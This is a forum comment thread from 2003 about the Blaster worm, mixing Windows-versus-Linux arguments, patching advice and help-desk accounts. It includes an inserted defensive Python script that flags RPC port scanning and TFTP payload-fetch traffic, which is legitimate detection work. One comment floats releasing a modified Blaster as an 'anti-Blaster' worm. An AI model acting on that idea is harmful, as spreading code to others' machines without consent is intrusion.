One of these comments in one of the blaster articles had a url to Blaster source code. Anyone want to de-fang it, and throw on an anti-Blaster app? Chances are the stuff that's been hit isn't secured against it yet, so simply hitting it with a modified Blaster should get rid of it, right?
For our windows terminal servers and a few workstations but our Novell cluster is chugging right along. AAAAHHHH Novell the best windows administration tool on the planet, once you get the client installed :)
And they noticed this why?
Our call centre has had 200-300 people in queue for the past 3 days about this (MSN Tech Support, I know, I know.. haha). Microsoft would not even let us call this a virii for the first 2 days even though people knew it was; all that we are allowed to do is build them a manual connection, enable ICF and get them to download the patch, then refer them to their OEM or virus scanner maker. I've mentioned to them that we should be turning off the system restore function after we install the patch, then turn it back on so it erases the virus infected backups. (I've noticed the virus scanners don't pick it out of the system restore files.) But supposedly clicking this checkbox is out of our 'Support Guidelines'. We are not allowed to remove the virus even though it's VERY simple.
Do these agencies really have such little protection against attack? This article makes it sound like Stanley Jobson dropped a hydra in a trapdoor after using a worm to break through the firewall.
If you expect an OS to be released and have absolutely no vulnerabilities from day one, then I would love to have some of what you are smoking.
Even Linux has its problems with security flaws. The only problem with Linux is you have to know a hell of a lot more about the system and be willing to invest more time in protecting it.
What did I have to do to protect my WinXP Pro machine? Visit Windows update every so often, usually once a week, download the updates and have a firewall. Things everyone using Windows should do, and if you exclude step one, things everyone should do.
The constant witching about MS is getting to be annoying, no one is perfect, but at least it is easy and painless to install updates if you install them when they are released, not when all the other idiots that waited until a virus is spreading are installing them.
I tried Linux, I have it dual booting on my machine, I don't like it. Sure if it had come out back when I was a kid I might have a different opinion of it, if I had more time to spend learning about it. But it didn't and I don't. No one is paying me to use it and so far no one has required that I know it. So I'm not wasting my time.
Unfair comparison. In your example, the gun is doing exactly what it was designed to do: shoot. The Microsoft product isn't performing as the users have reason to expect it to. And it's because of shoddy workmanship on the part of Microsoft. A better gun example would have been the M16 during Vietnam when it was malfunctioning all over the place. And yes, it was the fault of Colt and the Army for insufficient testing of the product. People died. In either case, shoddy design & manufacture should be penalized.
Just hit the support.microsoft.com site and start counting.
For me, I'm content with the approximation "many", or possibly "too many", or "way too fsking many"
Other OS's that I'm familiar with have many vulnerabilities in programs that run on them, but relatively few in the OS itself. With the various flavors of Windows, there isn't a significant difference. When IIS is installed by default, an IIS flaw is an OS flaw. When Apache is not installed by default, its flaws should not be counted with those of the OS.
Don't count every buffer overflow in every chat client on source forge. DO count every flaw in IE and outlook express, because getting rid of them is impractical. You could probably throw in media player as well.
I agree that you have to stay on top of the updates, but in my environment the many linux and OpenBSD boxes are much less trouble than the few windows boxes - both proportionally and absolutely.
So far as your assertions about "statically linked" virii and the impracticality of attacking *nux, I'll remind you of the redhat attack of a couple years back. Took out quite a number of systems as I recall - across a wide variety of revisions and, because RH is the "base" for so many others, a variety of distributions were affected (including my own, which was running Mandrake 6 at the time).
No, the fault still lies greatly in the hands of Microsoft. They build a system, market it as drool-proof, drooling idiots all over the world buy it, and those drooling idiots get burned and are still so stupid that they don't realize they were LIED TO IN THE FIRST PLACE!
So what? Other systems don't have security holes? Those holes aren't eventually exposed, and patches released? Try subscribing to bugtraq or security focus or any of the dozens of other similar lists for a while and see how many holes in Linux, irix and every other *nix come out. As many as the MSFT products? no.. ZERO.. hardly..
Patches are a fact of life.. IF you don't want to patch your systems, don't connect them. It's really just that simple.
They build a system, market it as drool-proof, drooling idiots all over the world buy it,
The 2 examples stated were city governments. They have large IT organizations that are perfectly capable of making informed decisions. They also have staff who are capable of rolling hotfixes and failed to do so. The time and cost to do so are very nearly zero and yet they chose to ignore the threat. They need to accept the responsibility.
If privacy had a tombstone it would read "We did it for your own good" . -- John Twelve Hawks
You're right about the gun. Point well taken. But what about my other example? What if one night you forget to lock your doors and someone breaks into your house. Is it your fault? No. Breaking and entering is breaking and entering whether they enter through an unlocked door or through a window they just broke. Microsoft may or may NOT be doing all they can to mitigate exposure to such malicious attacks. But, do people really think that Microsoft is intentionally releasing a product that they believe to be flawed? They set their own time frames/release dates due to the lack of competition. It's not like they try to beat the next version of Redhat to market. The bottom line is that the "bad guys" are always a little smarter. The dark side of the force is too strong.
-- Probability does not dismiss possibility --
Other systems don't have security holes?
It isn't about doing a hole-for-hole comparison and seeing which pile is higher. It's a matter of comparing a vendor's claims with their delivered goods. Few vendors rank with Microsoft when measured by cunning and deceitfulness.
They have large IT organizations that are perfectly capable of making informed decisions.
Are they? Government bureaucracies are not often highly regarded for their efficiency or sharp decision making abilities. For example, our DMV "upgraded" recently from a modest mainframe-backed system to a new-fangled system with Windows clients. Going to the DMV now takes longer and is much worse than ever before. Microsoft wants people to believe their technology will make everyone's problems disappear as if by magic, when, in reality, they are straight-faced liars selling snake oil.
Healthcare article at Kuro5hin
Troll, how is something like redhat's up2date harder than windows update??? And what the hell did I say about turning shit on by default? Why don't they turn on Windows firewall by default? Why don't they turn off high-vulnerability services by default? What's the last Linux worm that fucked things up on the scale of a MS worm?
If you're going to troll, put some effort into it. That drivel you spewed was just plain sad.
If I make a bullet-proof windshield for you that doesn't protect against bullets, it would be my fault that the thing doesn't stop them. If your armored truck gets robbed because of this, I would be partially responsible for your losses, second only to the people that robbed it.
If Microsoft would just admit that their software is insecure, we would get back to calling it an insecure piece of crap. When they win national defense software contracts and claim to be secure, I have a serious problem with them.
I use OpenBSD on anything life-or-death and Linux on everything else. I have yet to see any of those systems get infected with a virus or invaded by crackers. The most I've been hurt from a virus was the downtime when my ISP caught Slammer.
Is installing a patch in winshit still as difficult as opening up their browser and going to the update site? Many of us connect to our servers from crummy connections that can't handle remote graphical terminals with Windows. If M$ has finally made an equivalent to "apt-get update && apt-get upgrade" since I discovered the glory of Posix-Compliance, then good job for them. If not, then they can bite my shiny metal ^D
You can't judge a book by the way it wears its hair.
Well, I say screw those who run Windows. You included.
Although "everything off" is good, "everything uninstalled" is better.
One of the things I like about my little Gentoo box is I don't even have the telnet and ftp daemons on disk, let alone open to hacker attack.
GCHQ Quantum Insert installed. If only our tongues were made of glass, how much more careful we would be when we speak
How'd this wind up as a comment for the article on a Windows virus? The parent comment clearly belongs to today's article about growing synthetic diamonds.
Broken slashcode?
90% of the desktops are Windows-Based.
Most Virus writers can purchase a PC and tools to develop a virus for under $200. Add maybe 3 years or so of experience with coding and you can probably code any virus you want to when dealing with Microsoft.
This is why we hear about Worms in the news that are Windows-based.
One of the downfalls of Linux is that it puts a UNIX like environment in the hands of Joe Blow Virus Writer. Also, it puts Linux in the hands of Robbie the Retarded Systems Admin. Similar to What NT has done in the past.
And yes, the Ramen Worm was pretty impressive, had we all been running Redhat 6.2, the news might have mentioned it
Place something witty here
Weird.. yeah I didn't post to that article, I posted to the synthetic diamond article... I was wondering why ppl were saying OffTopic..
- Voxel
Modesty is one of life's greatest attributes
I got to spend most of the day playing with this. Turns out this is msblast. The '60 seconds to reboot' thing only affects XP, not 2k. The reason we were getting these strange symptoms and nothing for the virus scanners to catch is that this is a failed msblast. The buffer overflow hit, but failed to download the payload through tftp. (Yes! Finally, an advantage to having your WAN links running at 750% of capacity - virus-induced TFTP transfers fail!) We found that installing MS03-026 on the system and rebooting cleared the weird behavior, and for one or two that did actually manage to download the actual virus file, Trend's newer virus defs find it and kill it mercilessly (even removing the registry entry.)(Trend pattern file v606, released yesterday, supposedly found msblast, but we didn't see any actual detections until v608 came out today. Could have just been that none of the machines had downloaded it yet yesterday...)
Hope this helps the people who had similar symptoms.
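The sequence described in the comment above (the RPC buffer overflow lands, then the payload is fetched over TFTP) leaves a trail in flow logs that can be checked for. The Python below is an added example, not part of the original thread: it flags hosts fanning out to many destinations on TCP 135, and hosts that open TFTP (UDP 69) back to a machine that just contacted them on 135. The log format, addresses, thresholds and the assumption that the exploited host initiates the TFTP transfer are all constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed one-line-per-flow log format (hypothetical, not a real product's):
#   2003-08-12T10:00:00 SRC=10.0.0.23 DST=10.0.1.1 PROTO=TCP DPT=135
LINE_RE = re.compile(r"^(\S+) SRC=(\S+) DST=(\S+) PROTO=(TCP|UDP) DPT=(\d+)$")


def build_sample():
    """Constructed sample log lines (not captured traffic)."""
    base = datetime(2003, 8, 12, 10, 0, 0)

    def line(offset, src, dst, proto, dport):
        ts = (base + timedelta(seconds=offset)).isoformat()
        return f"{ts} SRC={src} DST={dst} PROTO={proto} DPT={dport}"

    # One host sweeping 30 addresses on TCP/135, one per second.
    lines = [line(i, "10.0.0.23", f"10.0.1.{i + 1}", "TCP", 135) for i in range(30)]
    # A client talking to the same RPC server three times: normal traffic.
    lines += [line(60 * i, "10.0.0.40", "10.0.0.5", "TCP", 135) for i in range(3)]
    # A host is contacted on 135, then opens TFTP back to the sender.
    lines.append(line(40, "10.0.0.23", "10.0.0.77", "TCP", 135))
    lines.append(line(45, "10.0.0.77", "10.0.0.23", "UDP", 69))
    # Unrelated TFTP with no preceding RPC contact.
    lines.append(line(50, "10.0.0.50", "10.0.0.9", "UDP", 69))
    lines.append("truncated or unparseable line")
    return lines


def parse_log(lines):
    """Return time-sorted (ts, src, dst, proto, dport) tuples; skip bad lines."""
    events = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ts, src, dst, proto, dport = m.groups()
        events.append((datetime.fromisoformat(ts), src, dst, proto, int(dport)))
    return sorted(events)


def find_rpc_scanners(events, window=timedelta(seconds=60), threshold=20):
    """Map source -> peak count of distinct TCP/135 destinations in one window."""
    recent = defaultdict(deque)  # src -> deque of (ts, dst) inside the window
    flagged = {}
    for ts, src, dst, proto, dport in events:
        if (proto, dport) != ("TCP", 135):
            continue
        q = recent[src]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:
            q.popleft()
        distinct = len({d for _, d in q})
        if distinct >= threshold:
            flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged


def find_tftp_callbacks(events, max_gap=timedelta(seconds=120)):
    """List (host, peer) pairs where host opened UDP/69 to a peer that had
    contacted it on TCP/135 within max_gap: a likely payload fetch attempt."""
    last_contact = {}  # (contacted host, contacting host) -> time of contact
    hits = []
    for ts, src, dst, proto, dport in events:
        if (proto, dport) == ("TCP", 135):
            last_contact[(dst, src)] = ts
        elif (proto, dport) == ("UDP", 69):
            seen = last_contact.get((src, dst))
            if seen is not None and ts - seen <= max_gap:
                hits.append((src, dst))
    return hits


if __name__ == "__main__":
    evts = parse_log(build_sample())
    print("scanning on TCP/135:", find_rpc_scanners(evts))
    print("TFTP after RPC contact:", find_tftp_callbacks(evts))
```

A host that shows up only in the second list matches the "failed msblast" case in the comment: the transfer was attempted, so the machine needs the patch even if no scanner finds a payload on disk.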
The MVA doesn't need a virus to slow it down. It crawls just fine on its own.
Shut up brain or I'll stab you with a Q-Tip. - Homer Simpson
How do you come up with the "formula" that you should see 1 virus for other platforms for every 20 developed for Windows?
If Windows has a 90% marketshare, that doesn't mean the alternatives will automatically have some directly relative percentage of virii targeted at them.
It's more complex than that. I propose that Microsoft, being as large as they are (and supposedly, a monopoly too, right?), have made far more enemies than the developers of alternative OS products. Look how many virii contain anti-MS messages inside them! They're purposely trying to punch holes in the MS products because they're the "standard".
It isn't as simple as a virus writer saying "Hmm... what does my workplace use? Oh, we run Linux? Ok then, a Linux virus it will be!"
Is that people still think the issue is one of the following problems:
1) script kiddies
2) lack of a good virus scanner
3) bugs or security holes
4) poor software
Ever notice that all of the above problems won't ever go away? no matter how hard you patch your box you will never catch up.
And as one wise poster said, "i don't patch too soon because the patch often introduces more problems than it fixes".
The reason that unix and mainframe environments are more secure than windows pc's is for one reason and one reason only......
Good design.
When i install postgress i install it under the postegress user. When i install Oracle i install it under the Oracle user. When i browse the web i run the browser as myself. When i read email i read email as myself.
NONE of the above users have root privileges. Yet when i run the above software on my windows server, more often than not it does have full admin rights and is/ or is equivalent to the admin user.
EVEN if i attempt good security measures i can't get around the fact that so many ms products want to run as root, or use services that run as root, or depend on infrastructures that run as root, etc etc etc.
So no matter how quickly you patch, human error and bugs in software will undoubtedly introduce new security problems.
In a multi user secured environment each user space is protected from every other user space by the inherent security model.
In a windows environment, most processes are all the same user, or for certain parts of their operations become the same user, or have the same user
....... WHICH IS ADMINISTRATOR.
And you can never stop the administrator from doing whatever it wants to do to your system because it is God.
and that is why virus manufacturers will never go out of business no matter how good ms-update becomes.
jech.
Besides your made-up figures, none of that made much sense. And one Linux worm? Wow.
Ok, I blame John Brunner for inventing worms, in Shockwave Rider.
My other car is a 1984 Nark Avenger.
Like hell it doesn't! Every part of my systems down to the little rubber feet on the bottom are detailed down to DLL level through version-controlled documents that are wet-ink signed on completion. We're considered validated by the FDA.
There's nothing wrong with using IE and IIS (well, maybe not IIS!) in a medical sector, but you take precautions. Lock it down, firewall it off and certainly don't expose it to the internet.
I *certainly* wouldn't let anyone using a PC that I don't admin and lockdown access the systems I admin. If anyone wants to sit at home in the garden looking at my systems using their insecure wifi connection they can't. Simple as that. It's just good practice. GxP, in fact.
My job is extending a business not patching it.
How can you gob off such crap. Really MOST businesses are not here to create a world for IT wannabes they are here for business!
Whilst you think we have the time to joy over the next elite computer hack perhaps we want to make things work.
And YES i have forgotten more about computers than you will ever know
A snippet of M$ propaganda from their website regarding Win2K3:
Security. Businesses have extended the traditional local area network (LAN) by combining intranets, extranets, and Internet sites. As a result, increased system security is now more critical than ever before. As part of the Microsoft commitment to reliable, secure, and dependable computing, the company has intensely reviewed the Windows Server 2003 family to identify possible fail points and exploitable weaknesses.
Good points, but my overall point is that there would be more around than what there currently is.
As for developers, I would argue that Microsoft has the lions share of the developer community and most of those seem to love Microsoft. So it doesn't seem out of reason to assume that some of them would try and hack other systems.
I don't agree that most of these contain anti-Microsoft messages either. Most seem to contain crap. The core issue is that Microsoft has ignored security at the cost of features while most of the competition hasn't and for the longest time I.T. consulting companies have ignored this as well. Now they should be held partially responsible.
Let's compare Applets to ActiveX. Java Applets were far more prevalent than ActiveX controls, but Sun took security seriously and Microsoft didn't. ActiveX is an abomination at best and Applets, although a pain are still useful.
The more I learn about science, the more my faith in God increases.